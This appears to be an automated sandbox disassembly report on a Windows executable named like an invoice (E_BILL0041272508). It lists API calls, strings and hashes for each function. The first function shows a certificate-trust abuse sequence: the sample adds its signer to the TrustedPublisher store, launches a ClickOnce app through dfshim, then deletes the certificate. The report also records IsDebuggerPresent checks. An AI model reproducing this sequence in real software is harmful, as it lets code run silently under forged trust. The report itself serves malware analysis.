LocalAlloc.KERNEL32(00000000,00040000), ref: 009B1063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009B1082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009B10B2
LocalAlloc.KERNEL32(00000000,?), ref: 009B10C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 009B10F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009B110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009B111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009B112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 009B1134
LocalFree.KERNEL32(00000000), ref: 009B113E
LocalFree.KERNEL32(00000000), ref: 009B115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009B116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009B1182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009B1198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009B11A9
LoadLibraryA.KERNELBASE(dfshim), ref: 009B11BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009B11C6
Sleep.KERNELBASE(00009C40), ref: 009B11E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 009B120B
CertCloseStore.CRYPT32(?,00000000), ref: 009B121A
LocalFree.KERNEL32(?), ref: 009B1223
LocalFree.KERNEL32(?), ref: 009B1228
LocalFree.KERNELBASE(?), ref: 009B122D

Strings

dfshim, xrefs: 009B11B5
ShOpenVerbApplicationW, xrefs: 009B11C0
1.3.6.1.4.1.311.4.1.1, xrefs: 009B1193, 009B11A4
TrustedPublisher, xrefs: 009B102B

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: ee4d31c95088542f4692ac44e56fb38463349ce90b8e13d080c824c45a35f67a
Instruction ID: 4d2c2d00c0f9c063e83ac9bc48582c14035b45f4b90caec6dc655cdb7a0a5aab
Opcode Fuzzy Hash: ee4d31c95088542f4692ac44e56fb38463349ce90b8e13d080c824c45a35f67a
Instruction Fuzzy Hash: 2D616F71A54218AFEB10AB94DE45FBFBBB9EF48B60F100115F614B72D0C7B199019BA4

Function 009B3677 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000,?,009B3F66,00000003,009B209F,009B1AFC), ref: 009B3698
TerminateProcess.KERNEL32(00000000,?,009B364D,?,009C02E0,0000000C,009B37A4,?,00000002,00000000,?,009B3F66,00000003,009B209F,009B1AFC), ref: 009B369F
ExitProcess.KERNEL32 ref: 009B36B1

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 549e374821e3cbdfff138fec93c1686f3109f911f6ad63b5cdb54d2d85cebaa5
Instruction ID: 46d5b5ae11390b102c7beef62cb1f300f182be20a3748483e6eb655ab5496317
Opcode Fuzzy Hash: 549e374821e3cbdfff138fec93c1686f3109f911f6ad63b5cdb54d2d85cebaa5
Instruction Fuzzy Hash: D5E0B631024548EFCF11BF54DF0ABAA3B69EF80365F008114FA559A271DBB5DE42DA50

Non-executed Functions

Function 009B191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009B192B
IsDebuggerPresent.KERNEL32 ref: 009B19F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B1A10
UnhandledExceptionFilter.KERNEL32(?), ref: 009B1A1A

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cd8c70af89ae5a31a5112b36d96b3972d0f82e67c3fb692529e8c5121e97d50a
Instruction ID: 5c84a5509557f02c723818b8746b882a394e536e8f389f1bfcd4833b11b96537
Opcode Fuzzy Hash: cd8c70af89ae5a31a5112b36d96b3972d0f82e67c3fb692529e8c5121e97d50a
Instruction Fuzzy Hash: 91312A75D05218DBDF20EF64DA897CDBBB8EF08310F1041AAE40CAB254EB709A84CF45

Function 009B4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009B466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009B4675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009B4682

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 7a6853dfebfee40fa49a6bb06f75e91d5ad6412312480d098c579070ce8abbf1
Instruction ID: ec2febcc4a598365d658b8a3c330c49e071318ca2eba542a61c7403858889280
Opcode Fuzzy Hash: 7a6853dfebfee40fa49a6bb06f75e91d5ad6412312480d098c579070ce8abbf1
Instruction Fuzzy Hash: B731B5749112289BCB21DF64D989BDDB7B8FF48320F5041EAE41CA7261E7709B858F45

Function 009B4A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 009B4BDE

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 42e4a384974033e6c5ac393091bebb93abb48d7ffc15a37abefdd7022c7c8851
Instruction ID: 5707ab72f68b8e6c5bb7ab700049ceab7023165c756085920aeb360f41ba2b60
Opcode Fuzzy Hash: 42e4a384974033e6c5ac393091bebb93abb48d7ffc15a37abefdd7022c7c8851
Instruction Fuzzy Hash: 2B310272800219AFCB249E78CD84FFEBBBDEB85324F0041A8F51897252E6309D409B90

Function 009BA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009BA490,?,?,00000008,?,?,009BA130,00000000), ref: 009BA6C2

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 86291d26ec541f32ae26d1febcd4145551b911fbf49ff40d21c5aac7db885774
Instruction ID: 58ea4d5f6d837ae02bd0cec5f2cc20c124efcf112522821a2ab7a4dc63c01153
Opcode Fuzzy Hash: 86291d26ec541f32ae26d1febcd4145551b911fbf49ff40d21c5aac7db885774
Instruction Fuzzy Hash: CEB17E71510608DFD715CF28C68ABA87BE0FF45374F298658E89ACF2A1C735DA82CB41

Function 009B1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009B1BEA

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: f807debd7200f84660680ae83bcc24dfffb71cda177050c38748035ee7279ead
Instruction ID: 6eff9a05043ccecce38ed42b5a2654978a147aa20134c81262ebfc8e709f1a6f
Opcode Fuzzy Hash: f807debd7200f84660680ae83bcc24dfffb71cda177050c38748035ee7279ead
Instruction Fuzzy Hash: 90519071E242098BDB19CF54D995BAEBBF8FB89360F248029C405EB295D374ED40CF54

Function 009B1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009B1300), ref: 009B1AB1

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 751f57634eaeb3bc201693fbe6f456a63b2448bda5ac12a65b7254676ae701c2
Instruction ID: 5d0f0b2559e2391532f7f05bbda319c05542684bf9e1b3e97cebc6079a516b19
Opcode Fuzzy Hash: 751f57634eaeb3bc201693fbe6f456a63b2448bda5ac12a65b7254676ae701c2
Instruction Fuzzy Hash:

Function 009B6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 009B6893

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ed6df72e1b788fda054375b8c71cca2967693b0d64c0b29768885ee80ad16fee
Instruction ID: 98158e94dbd0233a23aeb1d30ce06bdcc6bc1a7b1bced5fda19ac3f870dff1c5
Opcode Fuzzy Hash: ed6df72e1b788fda054375b8c71cca2967693b0d64c0b29768885ee80ad16fee
Instruction Fuzzy Hash: 29A02230B2C202CF8300CF38AF8A30C3AECAB00AE0B0B0028E008C00B0EB308080BF02

Function 009B6507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 009B654B

Part of subcall function 009B6078: _free.LIBCMT ref: 009B6095
Part of subcall function 009B6078: _free.LIBCMT ref: 009B60A7
Part of subcall function 009B6078: _free.LIBCMT ref: 009B60B9
Part of subcall function 009B6078: _free.LIBCMT ref: 009B60CB
Part of subcall function 009B6078: _free.LIBCMT ref: 009B60DD
Part of subcall function 009B6078: _free.LIBCMT ref: 009B60EF
Part of subcall function 009B6078: _free.LIBCMT ref: 009B6101
Part of subcall function 009B6078: _free.LIBCMT ref: 009B6113
Part of subcall function 009B6078: _free.LIBCMT ref: 009B6125
Part of subcall function 009B6078: _free.LIBCMT ref: 009B6137
Part of subcall function 009B6078: _free.LIBCMT ref: 009B6149
Part of subcall function 009B6078: _free.LIBCMT ref: 009B615B
Part of subcall function 009B6078: _free.LIBCMT ref: 009B616D

_free.LIBCMT ref: 009B6540

Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891

_free.LIBCMT ref: 009B6562
_free.LIBCMT ref: 009B6577
_free.LIBCMT ref: 009B6582
_free.LIBCMT ref: 009B65A4
_free.LIBCMT ref: 009B65B7
_free.LIBCMT ref: 009B65C5
_free.LIBCMT ref: 009B65D0
_free.LIBCMT ref: 009B6608
_free.LIBCMT ref: 009B660F
_free.LIBCMT ref: 009B662C
_free.LIBCMT ref: 009B6644

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6d50835d5c4d0bc375f8e5a79b77fc12bce0689b22e6e0bdbfa83e32cb2fa5e5
Instruction ID: c5e5d7d30e408b49c744e5d4e9dd7b9e849e8fd8bee1478251ec80fe27f9f30c
Opcode Fuzzy Hash: 6d50835d5c4d0bc375f8e5a79b77fc12bce0689b22e6e0bdbfa83e32cb2fa5e5
Instruction Fuzzy Hash: 40313B71600304DFEB71AA7ADA05BEA73F8AB80320F14442AF449DB192DE79FD50DB50

Function 009B4330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 009B4344

Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891

_free.LIBCMT ref: 009B4350
_free.LIBCMT ref: 009B435B
_free.LIBCMT ref: 009B4366
_free.LIBCMT ref: 009B4371
_free.LIBCMT ref: 009B437C
_free.LIBCMT ref: 009B4387
_free.LIBCMT ref: 009B4392
_free.LIBCMT ref: 009B439D
_free.LIBCMT ref: 009B43AB

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0af63c769485df3d32e0ed8a166e56f3b172c95757b3854ad894d288a046ce7c
Instruction ID: dc29bc16639e17ea54553d13fd529e929d5553f201d0e052c0a19ffe64736e2d
Opcode Fuzzy Hash: 0af63c769485df3d32e0ed8a166e56f3b172c95757b3854ad894d288a046ce7c
Instruction Fuzzy Hash: 25118976600148FFCB41EF96DA42DD93BB5EF84760F5141A6FA084F163DA31DE50AB80

Function 009B7AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,009B54C8,00000000,?,?,?,009B7D05,?,?,00000100), ref: 009B7B0E
__alloca_probe_16.LIBCMT ref: 009B7B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,009B7D05,?,?,00000100,5EFC4D8B,?,?), ref: 009B7B94
__alloca_probe_16.LIBCMT ref: 009B7C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 009B7C8E
__freea.LIBCMT ref: 009B7C9B

Part of subcall function 009B62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,009B7E5B,?,00000000,?,009B686F,?,00000004,00000000,?,?,?,009B3BCD), ref: 009B6331

__freea.LIBCMT ref: 009B7CA4
__freea.LIBCMT ref: 009B7CC9

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: fc9cf0e005a4be03d3bc6089774fc07f0864ee7c3ec724693ec6b70d751a585e
Instruction ID: 7dbe270698c829fd530a01baacd75a06e46b99cf20a28fa7800f529ad030ca05
Opcode Fuzzy Hash: fc9cf0e005a4be03d3bc6089774fc07f0864ee7c3ec724693ec6b70d751a585e
Instruction Fuzzy Hash: 3351A07261421AABDB259EA4CE41FFBBBAAEB84770F15472CF804D6240EB74DC40D690

Function 009B8417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,009B8B8C,?,00000000,?,00000000,00000000), ref: 009B8459
__fassign.LIBCMT ref: 009B84D4
__fassign.LIBCMT ref: 009B84EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 009B8515
WriteFile.KERNEL32(?,?,00000000,009B8B8C,00000000,?,?,?,?,?,?,?,?,?,009B8B8C,?), ref: 009B8534
WriteFile.KERNEL32(?,?,00000001,009B8B8C,00000000,?,?,?,?,?,?,?,?,?,009B8B8C,?), ref: 009B856D

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7023e6bc8629dd21298b1c37ddc0b34407cc7253904a466fc1da2b7104344c07
Instruction ID: 4545fef181366f3f7b854ac4d12e7a0c0cec77466bf84a54e5b9cf5d634bbab2
Opcode Fuzzy Hash: 7023e6bc8629dd21298b1c37ddc0b34407cc7253904a466fc1da2b7104344c07
Instruction Fuzzy Hash: A451BF70E002499FDB20CFA8D985AEEBBFDEF19320F14415AF955E7291DB709941CBA0

Function 009B1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 009B1E37
___except_validate_context_record.LIBVCRUNTIME ref: 009B1E3F
_ValidateLocalCookies.LIBCMT ref: 009B1EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 009B1EF3
_ValidateLocalCookies.LIBCMT ref: 009B1F48

Strings

csm, xrefs: 009B1EDD

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 961ce01566496b57f2c3c8e23cc353ee6b39e1337ab52f02c3e16495fbed4752
Instruction ID: be40c022417c26c6b4f129a287aaa441af078305045340c7bf91f9970523eaed
Opcode Fuzzy Hash: 961ce01566496b57f2c3c8e23cc353ee6b39e1337ab52f02c3e16495fbed4752
Instruction Fuzzy Hash: 2B41B134A00208ABCF10DF68C995BEEBBB5EF85374F548055E8159B292D735E901CB91

Function 009B621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009B61DF: _free.LIBCMT ref: 009B6208

_free.LIBCMT ref: 009B6269

Part of subcall function 009B4869: HeapFree.KERNEL32(00000000,00000000,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?), ref: 009B487F
Part of subcall function 009B4869: GetLastError.KERNEL32(?,?,009B620D,?,00000000,?,00000000,?,009B6234,?,00000007,?,?,009B669F,?,?), ref: 009B4891

_free.LIBCMT ref: 009B6274
_free.LIBCMT ref: 009B627F
_free.LIBCMT ref: 009B62D3
_free.LIBCMT ref: 009B62DE
_free.LIBCMT ref: 009B62E9
_free.LIBCMT ref: 009B62F4

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction ID: 5bd093fe8413fce8a5b4b814a166615336307300b3e07743b5a751f5d114df83
Opcode Fuzzy Hash: 1d7f3cd73ca15569adc6f3b3063faa031294499d8d9ad134557c71114fc07fde
Instruction Fuzzy Hash: 38115171544B14AAD520B7B5CE07FCB77AC5F80720F404825F69EAA093DA79BA045690

Function 009B23D1 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,009B23C8,009B209F,009B1AFC), ref: 009B23DF
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B23ED
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B2406
SetLastError.KERNEL32(00000000,009B23C8,009B209F,009B1AFC), ref: 009B2458

Memory Dump Source

Source File: 00000000.00000002.2527032776.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true

Associated: 00000000.00000002.2527016197.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527049294.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527066227.00000000009C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2527081397.00000000009C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_E_BILL0041272508.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9b004e3385ba15a9b773ef25430f80a8f4e860bb8a63a8da99b73b782179515a
Instruction ID: cc45b61b704da7b5adf8bb2438c7e54a189c82b54ec31b64612da6566d0b5ea3
Opcode Fuzzy Hash: 9b004e3385ba15a9b773ef25430f80a8f4e860bb8a63a8da99b73b782179515a
Instruction Fuzzy Hash: 99012B7351D3159FA72467B87E85BE72B59EB427F5730033AF920814F9EF518C81A244

Function 009B4424 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(00000008,?,009B6D69,?,?,?,009C04C8,0000002C,009B3F34,00000016,009B209F,009B1AFC), ref: 009B4428
_free.LIBCMT ref: 009B445B
_free.LIBCMT ref: 009B4483
SetLastError.KERNEL32(00000000), ref: 009B4490
